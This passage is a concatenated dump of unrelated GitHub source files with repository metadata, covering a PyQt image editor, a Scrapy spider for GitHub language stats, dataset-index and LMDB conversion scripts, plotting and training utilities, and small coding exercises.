QGridLayout\nfrom PyQt5.QtGui import QImage, QGuiApplication\nfrom PyQt5.QtCore import QEvent\n\nfrom .menu_bar import MenuBar\nfrom .editor import Editor\nfrom .events import ExecuteCommandEvent, DeleteEditorEvent, ChangeActiveEditorEvent, NewSelectionEvent\nfrom .css import PYCTURE_CSS\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setWindowTitle(\"Pycture\")\n self.setStyleSheet(PYCTURE_CSS)\n self.setMenuBar(MenuBar(self))\n placeholder_widget = QWidget()\n self.setCentralWidget(placeholder_widget)\n self.setup_size()\n self.editors = {}\n self.active_editor = None\n\n def setup_size(self):\n desktop_size = QGuiApplication.screens()[0].size()\n screen_width = desktop_size.width()\n screen_height = desktop_size.height()\n width = round(0.4 * screen_width)\n height = round(0.4 * screen_height)\n x = (screen_width - width) / 2\n y = height / 2\n self.setGeometry(x, y, width, height)\n\n def customEvent(self, event: QEvent):\n if isinstance(event, ExecuteCommandEvent):\n event.command.execute(self)\n elif isinstance(event, DeleteEditorEvent):\n if event.editor_name == self.active_editor:\n self.active_editor = None\n self.editors.pop(event.editor_name)\n elif isinstance(event, ChangeActiveEditorEvent):\n self.set_active_editor(event.editor_name)\n elif isinstance(event, NewSelectionEvent):\n title = self.get_active_editor().windowTitle() + \"(Selection)\"\n self.add_editor(event.image, title)\n\n else:\n event.ignore()\n\n def add_editor(self, image: QImage = None, name: str = \"\", editor: Editor = None):\n if editor:\n name = editor.windowTitle()\n \n while self.editors.get(name):\n (name, extension) = path.splitext(name)\n name = name + \"+\" + extension\n \n if editor:\n editor.setWindowTitle(name)\n self.editors[name] = editor\n else:\n self.editors[name] = Editor(self, image, name)\n \n self.set_active_editor(name)\n\n def get_active_editor(self) -> Editor:\n return self.editors.get(self.active_editor)\n\n def get_active_editor_name(self) -> str:\n return self.active_editor\n\n def get_editor(self, editor: str) -> Editor:\n return self.editors.get(editor)\n\n def set_active_editor(self, name: str):\n if (self.active_editor):\n self.editors[self.active_editor].set_active(False)\n self.active_editor = name\n self.editors[name].set_active(True)\n\n def get_editor_list(self) -> [Editor]:\n return self.editors\n","repo_name":"miguel-martinr/Pycture","sub_path":"src/pycture/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42947319221","text":"import scrapy\nimport json\nimport re\nclass gitSpider(scrapy.Spider):\n name = 'gitviz spider'\n user = 'torvalds'\n repos_link = 'https://api.github.com/users/'+ user + '/repos'\n start_urls = [repos_link]\n \n # def start_requests():\n\n def parse(self, response):\n json_res = json.loads(response.body_as_unicode())\n first = type(json_res) is list\n if first:\n for item in json_res:\n yield response.follow(item['languages_url'], self.parse)\n else:\n reply = {}\n reply['repo'] = response.url.split('/')[5]\n for key in json_res:\n reply['language'] = key\n reply['byte_count'] = json_res[key]\n yield reply","repo_name":"soechun/gitviz","sub_path":"language.py","file_name":"language.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29853795330","text":"import argparse\nimport csv\nimport hashlib\nimport json\nimport os\nimport itertools\nimport re\nfrom mirdata.validate import md5\n\n\nacousticbrainz_genre_INDEX_PATH = '../mirdata/datasets/indexes/test_acousticbrainz_genre_index.json'\nACOUSTICBRAINZ_GENRE_ANNOTATION_SCHEMA = ['JAMS']\n\n\ndef make_acousticbrainz_genre_index(data_path):\n index = 0\n datasets = ['tagtraum', 'allmusic', 'lastfm', 'discogs']\n dataset_types = ['validation', 'train']\n f = open(acousticbrainz_genre_INDEX_PATH, 'w')\n f.write('{\\n')\n for dataset, dataset_type in itertools.product(datasets, dataset_types):\n tsv_file = open(os.path.join(data_path, \"acousticbrainz-mediaeval-\" + dataset + \"-\" + dataset_type + \".tsv\"))\n read_tsv = csv.reader(tsv_file, delimiter=\"\\t\")\n next(read_tsv, None)\n read_tsv_list = list(read_tsv)\n for line, row in enumerate(read_tsv_list):\n mbid = \"\"\n track_id = dataset + '#' + dataset_type\n for i, r in enumerate(row):\n track_id = track_id + '#' + r\n if i == 0:\n mbid = r\n ann_path = os.path.join(data_path, \"acousticbrainz-mediaeval-\" + dataset_type, mbid[:2], mbid + \".json\")\n f.write(' \\\"%s\\\": {\\n' % (track_id,))\n f.write(' \\\"data\\\": [\\n')\n f.write(' \\\"%s\\\",\\n' % (ann_path.replace(data_path + '/', ''),))\n f.write(' \\\"%s\\\"\\n' % md5(ann_path))\n f.write(' ]\\n')\n is_the_last = dataset == datasets[-1] and dataset_type == dataset_types[-1] and line == len(read_tsv_list)-1\n if not is_the_last:\n f.write(' },\\n')\n else:\n f.write(' }\\n')\n index += 1\n\n f.write('}')\n\n\ndef main(args):\n make_acousticbrainz_genre_index(args.acousticbrainz_genre_data_path)\n\n\nif __name__ == '__main__':\n PARSER = argparse.ArgumentParser(description='Make acousticbrainz_genre index file.')\n PARSER.add_argument('acousticbrainz_genre_data_path', type=str, help='Path to acousticbrainz_genre data folder.')\n main(PARSER.parse_args())\n # with open(acousticbrainz_genre_INDEX_PATH, 'r') as json_file:\n # data = json.load(json_file)\n # for row in data:\n # print(row)\n\n","repo_name":"sebastianrosenzweig/mirdata","sub_path":"scripts/make_acousticbrainz_genre.py","file_name":"make_acousticbrainz_genre.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"45003942406","text":"from plot_bars import plot_domains\nimport numpy as np, seaborn as sns\nfrom matplotlib.pyplot import figure\nfrom csb.io import load\n#sns.set(style='ticks', palette='Set1', context='notebook', font_scale=1.)\nsns.set(palette='Set2', context='notebook', font_scale=1.5)\n\n\n\ndef load_membership_linh(serial):\n rs = open('../data/Membership/'+str(serial)+'.txt').readlines()[0]\n mbs = rs.split('\\t')\n mbs = np.array([int(c) for c in mbs])\n return mbs\n\n# if False:\n# #proteins = ('pyruvate', 'T7', 'GroEL', 'AST', 'AdH')\n# proteins = ('T7',)\n# #serial = [2733, 441, 1537, 344, 243]\n# serial = [441]\n# for i, name in enumerate(proteins):\n# new_ = []\n# membership = load('../data/{}.pkl'.format(name))\n# membership1 = load_membership_linh(serial[i])\n# new_.append(membership1)\n# new_.append(membership[0])\n# for j in membership[3:]:\n# new_.append(j)\n# print len(membership1), len(j)\n#\n# from csb.io import dump\n#\n# dump(new_, '../data/linh/{}.pkl'.format(name))\n\n #load Linh results\n\n\nif True:\n order = (\n 'Literature', 'Ours', 'Spectrus', 'Spectrus (K=2)', 'Spectrus (K=3) *', 'DynDom')\n\n method_dict = {'AdH': ['Ours', 'DynDom', 'Spectrus (K=2)', 'Spectrus (K=3) *'],\n 'AST': ['Ours', 'DynDom', 'Spectrus'],\n 'pyruvate': ['Ours', 'DynDom', 'Spectrus', 'Literature'],\n 'GroEL': ['Ours', 'DynDom', 'Spectrus', 'Literature'],\n 'T7': [ 'Ours','Literature', 'Spectrus', 'DynDom']}\n\n names = {'T7': 'T7 RNA polymerase',\n 'pyruvate': 'Pyruvate phosphate dikinase',\n 'GroEL': 'GroEL',\n 'AdH': 'Alcohol dehydrogenase',\n 'AST': 'Aspartate aminotransferase'}\n\n colors = sns.color_palette()\n\n\n def sort_membership(membership):\n\n new_membership = np.zeros(len(membership), 'i')\n labels = list(set(membership.tolist()))\n counts = map(membership.tolist().count, labels)\n labels = np.array(labels)[np.argsort(counts)[::-1]]\n\n for i, label in enumerate(labels):\n new_membership += i * (membership == label).astype('i')\n\n return new_membership\n\n\n def add_plot(ax, name, ref_name='Literature'):\n\n membership = map(sort_membership, load('../data/linh/{}.pkl'.format(name)))\n methods = method_dict[name]\n indices = map(order.index, methods)\n indices = np.argsort(indices)[::-1]\n membership = map(membership.__getitem__, indices)\n methods = map(methods.__getitem__, indices)\n\n K = max(map(max, membership))\n if ref_name in methods:\n plot_domains(K, membership, colors, methods, 0.55, methods.index(ref_name), ax=ax)\n else:\n plot_domains(K, membership, colors, methods, 0.55, ax=ax)\n ax.annotate(names[name], xy=(0., 0.65), fontsize=16, xycoords='axes fraction')\n ax.grid(False)\n ax.set_ylim(-0.5, 5.5)\n\n fig = figure(figsize=(8, 12))\n\n proteins = ('pyruvate', 'T7', 'GroEL', 'AST', 'AdH')\n n = len(proteins)\n\n ref_names = {'HIV': 'Gibbs (prior 2)'}\n\n for counter, protein in enumerate(proteins, 1):\n ax = fig.add_subplot(n, 1, counter)\n # ax.set_facecolor('Black')\n\n add_plot(ax, protein, ref_name=ref_names.get(protein, 'Literature'))\n\n fig.savefig('../latex/img/fig11.pdf', bbox_inches='tight')","repo_name":"dtklinh/GBRDE","sub_path":"Utils/DrawAssessment.py","file_name":"DrawAssessment.py","file_ext":"py","file_size_in_byte":3428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"28501884551","text":"# 167. Two Sum II - Input array is sorted\n\n# Given an array of integers that is already sorted in ascending order,\n# find two numbers such that they add up to a specific target number.\n\n# The function twoSum should return indices of the two numbers such that\n# they add up to the target, where index1 must be less than index2.\n\n# Note:\n# Your returned answers (both index1 and index2) are not zero-based.\n# You may assume that each input would have exactly one solution and you\n# may not use the same element twice.\n\n# Example:\n# Input: numbers = [2,7,11,15], target = 9\n# Output: [1,2]\n# Explanation: The sum of 2 and 7 is 9. Therefore index1 = 1, index2 = 2.\n\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n p, q = 0, len(numbers) - 1\n while numbers[p] + numbers[q] != target:\n if numbers[p] + numbers[q] > target: q -= 1\n else: p +=1\n return [p + 1, q + 1]\n\n\ndef log(correct, res):\n if len(correct) == len(res) and set(correct) == set(res): print(\"[v]\", res)\n else: print(\">>> INCORRECT >>>\", correct, \" | \", res)\n\nt = Solution()\n\nlog([1,2], t.twoSum([2,7,11,15], 9))\nlog([3,6], t.twoSum([1,2,3,7,11,48,51,154,234], 51))","repo_name":"DmitryVlaznev/leetcode","sub_path":"167-two-sum-ii-input-array-is-sorted.py","file_name":"167-two-sum-ii-input-array-is-sorted.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"23110995601","text":"# coding:UTF-8\n# 小明口袋有4个球,分别是红色,红色,黄色,蓝色。每次随机取出一个球记下颜色,然后再放回口袋,小明一共取了两次球,不考虑顺序,请给出所有颜色组合\n\nimport random\n\nballs = ['r','r','y','b']\n# balls = ['红色','红色','黄色','蓝色']\nb = []\nball = ''\nball1 = ''\nballall = [] # 所有排列组合\nballresult = [] # 结果\nfor j in range(0, 100):\n b0 = random.choice(balls)\n b1 = random.choice(balls)\n ball = b0 + '&' + b1\n ball1 = b1 + '&' + b0\n if ball1 not in (ballall):\n ballall.append(ball1)\n # print(ballall)\n if (ball == ball1) and ball not in(ballresult):\n ballresult.append(ball)\n\n elif ball not in (ballall) and ball not in(ballresult):\n ballresult.append(ball)\n\nprint(ballresult)\n","repo_name":"uyaly/study2018","sub_path":"python/笛卡尔算法/color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10146481249","text":"test_=int(input())\nwhile(test_):\n test_-=1\n n=int(input())\n dic={}\n a=[]\n a = list(map(int,input().split()))\n for i in a:\n if(i in dic):\n dic[i]+=1\n else:\n dic[i]=1\n if len(dic)==1:\n print('-1')\n continue\n mx,mn=max(dic.values()),min(dic.values())\n print(mx-mn)\n","repo_name":"Geven1/hackerearth","sub_path":"CodeMonk/Monk being monitor.py","file_name":"Monk being monitor.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19599902600","text":"def evaluar(nombre_archivo):\n\twith open(nombre_archivo, \"r\", encoding=\"utf-8\") as doc:\n\t\tlines = doc.readlines()\n\n\tmatriz = [line.strip().split() for line in lines if line.strip()]\n\tpatterns = [line.strip().split() for line in lines if not line.strip()]\n\n\twith open(\"resultado.txt\", \"w\", encoding=\"utf-8\") as output:\n\t\tfor pattern in patterns:\n\n\t\t\ti = 0\n\t\t\trows_found = []\n\n\t\t\tfor i in range(len(matriz)):\n\t\t\t\trow = matriz[i]\n\t\t\t\tif len(row) == len(pattern) and match(row, pattern):\n\t\t\t\t\ti += 1\n\t\t\t\t\trows_found.append(str(i))\n\n\t\t\t#output.write(f\"{i} veces\\n\")\n\n\t\t\tif i > 0:\n\t\t\t\toutput.write(\" \".join(rows_found) + \"\\n\\n\")\n\t\t\telse:\n\t\t\t\toutput.write(\"\\n\")\n\n\ndef match(row, pattern):\n\tfor j in range(len(row)):\n\t\tif row[j] != pattern[j]:\n\t\t\treturn False\n\treturn True","repo_name":"renatovc/Python","sub_path":"FPI/Controles Laboratorio/Control_2.py","file_name":"Control_2.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42359844566","text":"import argparse\nimport torch\nfrom pytorch_lightning import Trainer\n\nfrom grammaticality_annotation.fine_tune_grammaticality_nn import CHILDESGrammarDataModule, \\\n CHILDESGrammarModel\n\n\ndef main(args):\n model = CHILDESGrammarModel.load_from_checkpoint(args.model_checkpoint)\n hparams = model.hparams\n dm = CHILDESGrammarDataModule(val_split_proportion=hparams.val_split_proportion,\n model_name_or_path=hparams.model_name_or_path,\n eval_batch_size=hparams.eval_batch_size,\n train_batch_size=hparams.train_batch_size,\n train_datasets=hparams.train_datasets,\n val_datasets=hparams.val_datasets,)\n dm.setup(\"fit\")\n\n trainer = Trainer(\n accelerator=\"auto\",\n devices=1 if torch.cuda.is_available() else None, # limiting got iPython runs\n )\n\n model.val_error_analysis = True\n\n print(\"\\n\\n\\nValidation:\")\n trainer.validate(model, dm)\n\n\ndef parse_args():\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\n \"--model-checkpoint\",\n type=str,\n required=True,\n )\n\n args = argparser.parse_args()\n\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n main(args)\n","repo_name":"mitjanikolaus/childes-communicative-feedback","sub_path":"grammaticality_annotation/eval_grammaticality_nn.py","file_name":"eval_grammaticality_nn.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30098695620","text":"import cv2\r\nimport numpy as np\r\n\r\n## Function to find object in an image using contours\r\ndef getContours(img, cThr=[100, 100], showCanny=False, minArea=1000, filter=0, draw=False):\r\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) ## convert image to grayscale\r\n imgBlur = cv2.GaussianBlur(imgGray, (5, 5), 1) ## create blurred image to smooth for preprocessing\r\n imgCanny = cv2.Canny(imgBlur, cThr[0], cThr[1]) ## create Canny image detecting edges using threshold values for preprocessing\r\n kernel = np.ones((5, 5)) ## create 5x5 pixel kernel\r\n imgDil = cv2.dilate(imgCanny, kernel, iterations=3) ## dilate the image using the kernel to increase edge sizes for preprocessing\r\n imgThre = cv2.erode(imgDil, kernel, iterations=2) ## erode image using the kernel to decrease edge sizes for preprocessing\r\n if showCanny: cv2.imshow('Canny', imgThre) ## display image\r\n contours, hierarchy = cv2.findContours(imgThre, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) ## find and store edges/contours of image\r\n finalCountours = [] ## create list to store final contours\r\n # loop through each contour\r\n for i in contours:\r\n area = cv2.contourArea(i) ## calculate area of contour\r\n if area > minArea:\r\n peri = cv2.arcLength(i, True) ## calculate perimeter of contour\r\n approx = cv2.approxPolyDP(i, 0.02 * peri, True) ## approximate the overall contour to ignore minor variations from perimeter\r\n bbox = cv2.boundingRect(approx) ## draw bounding box around contour\r\n if filter > 0:\r\n if len(approx) == filter:\r\n finalCountours.append([len(approx), area, approx, bbox, i]) ## add contour to list of final contours if length matches filter parameter\r\n else:\r\n finalCountours.append([len(approx), area, approx, bbox, i]) ## add contour to list of final contours if filter parameter is zero\r\n finalCountours = sorted(finalCountours, key=lambda x: x[1], reverse=True) ## sort contours from largest to smallest\r\n if draw:\r\n for con in finalCountours:\r\n cv2.drawContours(img, con[4], -1, (0, 0, 255), 3) ## draw contours on image\r\n return img, finalCountours\r\n\r\n## Function to reorder points of object to consistent order for calculation\r\ndef reorder(myPoints):\r\n # print(myPoints.shape)\r\n myPointsNew = np.zeros_like(myPoints) ## create numpy array of zeros in same shape as points array\r\n myPoints = myPoints.reshape((4, 2)) ## reshape array for rectangles\r\n add = myPoints.sum(1) ## add the points\r\n myPointsNew[0] = myPoints[np.argmin(add)] ## set first point as minimum of sum\r\n myPointsNew[3] = myPoints[np.argmax(add)] ## set last point as maximum of sum\r\n diff = np.diff(myPoints, axis=1) ## subtract the points\r\n myPointsNew[1] = myPoints[np.argmin(diff)] ## set second point as minimum of difference\r\n myPointsNew[2] = myPoints[np.argmax(diff)] ## set third point as maximum of difference\r\n return myPointsNew\r\n\r\n## Function to warp an image to dimensions of uniform background\r\ndef warpImg(img, points, w, h, pad=20):\r\n # print(points)\r\n points = reorder(points) ## reorder the points\r\n pts1 = np.float32(points) ## convert points to float\r\n pts2 = np.float32([[0, 0], [w, 0], [0, h], [w, h]]) ## convert second set of points to float using image dimensions\r\n matrix = cv2.getPerspectiveTransform(pts1, pts2) ## transform the first set of points to second set\r\n imgWarp = cv2.warpPerspective(img, matrix, (w, h)) ## warp the image to fill with background\r\n imgWarp = imgWarp[pad:imgWarp.shape[0] - pad, pad:imgWarp.shape[1] - pad] ## add pad to image for calculations\r\n return imgWarp\r\n\r\n## Function to calculate the size of an object using points\r\ndef findDis(pts1, pts2):\r\n return ((pts2[0] - pts1[0]) ** 2 + (pts2[1] - pts1[1]) ** 2) ** 0.5","repo_name":"tannerkhemphill/tello-drone-ms-project","sub_path":"MeasureFinder.py","file_name":"MeasureFinder.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29875820960","text":"import datetime\nimport os\nfrom collections import OrderedDict\n\nimport matplotlib\nimport numpy as np\nfrom torch import save\nfrom torch.nn.utils import clip_grad_norm\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n\ndef check_update(model, grad_clip, grad_top):\n \"\"\"\n Check gradient against limits\n \"\"\"\n skip_flag = False\n grad_norm = clip_grad_norm(parameters=model.parameters(), max_norm=grad_clip)\n if np.isinf(x=grad_norm):\n print(\"gradient is inf\")\n skip_flag = True\n elif grad_norm > grad_top:\n print(\"gradient is above the top level\")\n skip_flag = True\n return grad_norm, skip_flag\n\n\ndef lr_decay(init_lr, global_step, warmup_steps):\n warmup_steps = float(warmup_steps)\n step = global_step + 1.\n lr = init_lr * warmup_steps ** 0.5 * np.minimum(step * warmup_steps ** -1.5,\n step ** -0.5)\n return lr\n\n\ndef save_checkpoint(model, optimizer, model_loss, out_path,\n current_step, epoch):\n checkpoint_path = 'checkpoint_{}.pth.tar'.format(current_step)\n checkpoint_path = os.path.join(out_path, checkpoint_path)\n print(\"\\n | > Checkpoint saving : {}\".format(checkpoint_path))\n\n new_state_dict = _trim_model_state_dict(model.state_dict())\n state = {'model': new_state_dict,\n 'optimizer': optimizer.state_dict(),\n 'step': current_step,\n 'epoch': epoch,\n 'linear_loss': model_loss,\n 'date': datetime.date.today().strftime(\"%B %d, %Y\")}\n save(state, checkpoint_path)\n\n\ndef _trim_model_state_dict(state_dict):\n r\"\"\"Remove 'module.' prefix from state dictionary. It is necessary as it\n is loded for the next time by model.load_state(). Otherwise, it complains\n about the torch.DataParallel()\"\"\"\n\n new_state_dict = OrderedDict()\n for k, v in state_dict.items():\n name = k[7:] # remove `module.`\n new_state_dict[name] = v\n return new_state_dict\n\n\ndef create_experiment_folder(root_path):\n \"\"\" Create a folder with the current date and time \"\"\"\n date_str = datetime.datetime.now().strftime(\"%B-%d-%Y_%I:%M%p\")\n output_folder = os.path.join(root_path, date_str)\n os.makedirs(output_folder, exist_ok=True)\n print(\" > Experiment folder: {}\".format(output_folder))\n return output_folder\n\n\ndef plot_alignment(alignment, info=None):\n fig, ax = plt.subplots(figsize=(16, 10))\n im = ax.imshow(alignment.T, aspect='auto', origin='lower',\n interpolation='none')\n fig.colorbar(im, ax=ax)\n xlabel = 'Decoder timestep'\n if info is not None:\n xlabel += '\\n\\n' + info\n plt.xlabel(xlabel)\n plt.ylabel('Encoder timestep')\n plt.tight_layout()\n fig.canvas.draw()\n data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n plt.close()\n return data\n\n\ndef plot_spectrogram(linear_output, audio):\n spectrogram = audio._denormalize(linear_output)\n fig = plt.figure(figsize=(16, 10))\n plt.imshow(spectrogram.T, aspect=\"auto\", origin=\"lower\")\n plt.colorbar()\n plt.tight_layout()\n fig.canvas.draw()\n data = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')\n data = data.reshape(fig.canvas.get_width_height()[::-1] + (3,))\n plt.close()\n return data\n","repo_name":"IvKosar/text2speech","sub_path":"utils/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":3372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43351725752","text":"# convert all other datasets to lmdb\nimport os\nimport cv2\nimport shutil\nimport random\nimport numpy as np\nimport caffe\nimport lmdb\nimport json\nimport argparse\nfrom caffe.proto import caffe_pb2\nimport xml.etree.ElementTree as ET\nfrom tqdm import tqdm\n\nCLASSES={\n \"Face\":[\"face\"],\n \"fddb\":[\"face\"],\n 'wider':['face'],\n \"Mask\": ['face','face_mask'],\n \"Head\":[\"head\"],\n \"Person\":[\"pedestrians\"],\n \"Hand\":[\"hand\"],\n \"Car\":[\"car\"],\n \"tower\":[\"tower\"],\n \"insect\":[\"leconte\",\"boerner\",\"armandi\",\"linnaeus\",\"coleoptera\",\"acuminatus\"],\n \"voc\": ['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse','motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train','tvmonitor']\n}\n\nclass Registry(object):\n def __init__(self):\n self._module_dict = dict()\n def _register_module(self, name, func):\n module_name = name\n if module_name in self._module_dict:\n raise KeyError('{} is already registered'.format(module_name))\n self._module_dict[module_name] = func\n def register_module(self, name, cls):\n self._register_module(name, cls)\n return cls\n def get(self, key):\n return self._module_dict.get(key, None)\n\n#conver anno to datum\n# img, [h,w,c] uint8 image using cv2.imread\n# bboxes, N*5 labels, each is [xmin,ymin,xmax,ymax,label], with label index from 0\ndef anno2datum(img,bboxes):\n if len(bboxes) == 0:\n return\n annotated_datum = caffe_pb2.AnnotatedDatum()\n annotated_datum.type = annotated_datum.BBOX\n datum = annotated_datum.datum \n datum.channels = img.shape[2]\n datum.width = img.shape[1]\n datum.height = img.shape[0]\n datum.encoded = True\n datum.label = -1\n datum.data = cv2.imencode('.jpg',img)[1].tobytes()\n groups = annotated_datum.annotation_group\n for bbox in bboxes:\n found_group = False\n instance_id = 0\n label = int(bbox[4]) + 1 # background is 0\n for group in groups:\n if group.group_label == label:\n if len(group.annotation) == 0:\n instance_id = 0\n else:\n instance_id = len(group.annotation)\n found_group= True\n annotation = group.annotation.add()\n break\n if not found_group:\n group = groups.add()\n instance_id = 0\n group.group_label = label\n annotation = group.annotation.add()\n annotation.instance_id = instance_id\n annotation.bbox.xmin = bbox[0] * 1.0 /img.shape[1]\n annotation.bbox.ymin = bbox[1] * 1.0 /img.shape[0]\n annotation.bbox.xmax = bbox[2] * 1.0 /img.shape[1]\n annotation.bbox.ymax = bbox[3] * 1.0 /img.shape[0]\n return annotated_datum\n\n#for voc xml annotation\n# data/voc\n# --images\n# --Annotations\n# --train.txt\n# --val.txt\n# each line in *.txt only contain filename like 000001.jpg\ndef xml2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n listfile_path = data_dir+\"/\"+args.split+\".txt\"\n if not os.path.exists(listfile_path):\n listfile_path = data_dir+\"/ImageSets/Main\"+\"/\"+args.split+\".txt\"\n with open(listfile_path) as f:\n cat2label = {cat: i for i, cat in enumerate(CLASSES[args.dataset])}\n lines=f.readlines()\n for line in tqdm(lines):\n filename=line.split()[0]\n if filename.endswith(\"jpg\"):\n filepath=data_dir+\"/images/\"+filename\n xml_path=data_dir+\"/Annotations/\"+filename[:-4]+\".xml\"\n else:\n filepath=data_dir+\"/images/\"+filename+\".jpg\"\n xml_path=data_dir+\"/Annotations/\"+filename+\".xml\"\n img = cv2.imread(filepath)\n if img is None:\n print(filepath+\" cannot read\")\n continue\n if not os.path.exists(xml_path):\n print(xml_path+\" has no annotation\")\n continue\n tree = ET.parse(xml_path)\n root = tree.getroot()\n bboxes = []\n for obj in root.findall('object'):\n name = obj.find('name').text\n if name not in CLASSES[args.dataset]:\n print(filepath+\" has no expect label \"+name)\n continue\n label = cat2label[name]\n difficult = int(obj.find('difficult').text)\n if difficult:\n continue\n bbox = obj.find('bndbox')\n x = float(bbox.find('xmin').text)\n y = float(bbox.find('ymin').text)\n x2 = float(bbox.find('xmax').text)\n y2 = float(bbox.find('ymax').text)\n bbox = [x,y,x2,y2,label]\n bboxes.append(bbox)\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename,annotated_datum.SerializeToString())\n#for data from paddledetection\n# data/insect\n# --JPEGImages\n# --Annotations\n# --train_list.txt\n# --val_list.txt\n# --test_list.txt\n# each line in *.txt contain filepath like JPEGImages/0001.jpg Annotations/0001.xml\ndef paddle2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n labelpath = data_dir+\"/\"+args.split+\"_list.txt\"\n with open(labelpath) as f:\n cat2label = {cat: i for i, cat in enumerate(CLASSES[args.dataset])}\n lines = f.readlines()\n for line in tqdm(lines):\n line = line.strip()\n filename = line.split(\" \")[0]\n imgpath = data_dir+\"/\"+filename\n xml_path = data_dir+\"/\"+line.split(\" \")[1]\n img = cv2.imread(imgpath)\n if img is None:\n print(imgpath+\" cannot read\")\n continue\n if not os.path.exists(xml_path):\n print(xml_path+\" has no annotation\")\n continue\n tree = ET.parse(xml_path)\n root = tree.getroot()\n bboxes = []\n for obj in root.findall('object'):\n name = obj.find('name').text\n if name not in CLASSES[args.dataset]:\n print(imgpath+\" has no expect label \"+name)\n continue\n label = cat2label[name]\n difficult = int(obj.find('difficult').text)\n if difficult:\n continue\n bbox = obj.find('bndbox')\n x = float(bbox.find('xmin').text)\n y = float(bbox.find('ymin').text)\n x2 = float(bbox.find('xmax').text)\n y2 = float(bbox.find('ymax').text)\n bbox = [x,y,x2,y2,label]\n bboxes.append(bbox)\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename,annotated_datum.SerializeToString())\n\n#txt annotation\n# data/***\n# --images\n# --train.txt\n# --val.txt\n# each line: imgpath,xmin,ymin,xmax,ymax, label\n# label index from 1\ndef txt2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir)\n db = lmdb.open(lmdb_dir,map_size=1e10)\n with db.begin(write=True) as txn:\n annopath = data_dir+\"/\"+args.split+\".txt\"\n with open(annopath) as f:\n lines = f.readlines()\n for line in tqdm(lines):\n items = line.strip().split(\" \")\n filename = items[0]\n imgpath = data_dir+\"/images/\"+filename\n img = cv2.imread(imgpath)\n if img is None:\n print(\"cannot read \"+imgpath)\n continue\n bboxes = []\n labels = items[1].split(\",\")\n for i in range(len(labels)/5):\n xmin = float(labels[i*5])\n ymin = float(labels[i*5+1])\n xmax = float(labels[i*5+2])\n ymax = float(labels[i*5+3])\n label = int(labels[i*5+4])\n bboxes.append([xmin,ymin,xmax,ymax,label-1])\n if len(bboxes) == 0:\n continue\n annotated_datum = anno2datum(img, bboxes)\n txn.put(filename,annotated_datum.SerializeToString())\n\n#for brainwash head dataset\n# data/Head\n# --brainwash_10_27_2014_images\n# --brainwash_11_13_2014_images\n# --brainwash_11_24_2014_images\n# --brainwash_train.idl\n# --brainwash_val.idl\n# --brainwash_test.idl\ndef idl2lmdb(args):\n data_dir=\"data/\"+args.dataset\n lmdb_root = data_dir+\"/lmdb\"\n if not os.path.exists(lmdb_root):\n os.makedirs(lmdb_root)\n lmdb_dir = lmdb_root+\"/\"+args.split+\"_lmdb\"\n if os.path.exists(lmdb_dir):\n shutil.rmtree(lmdb_dir) \n db = 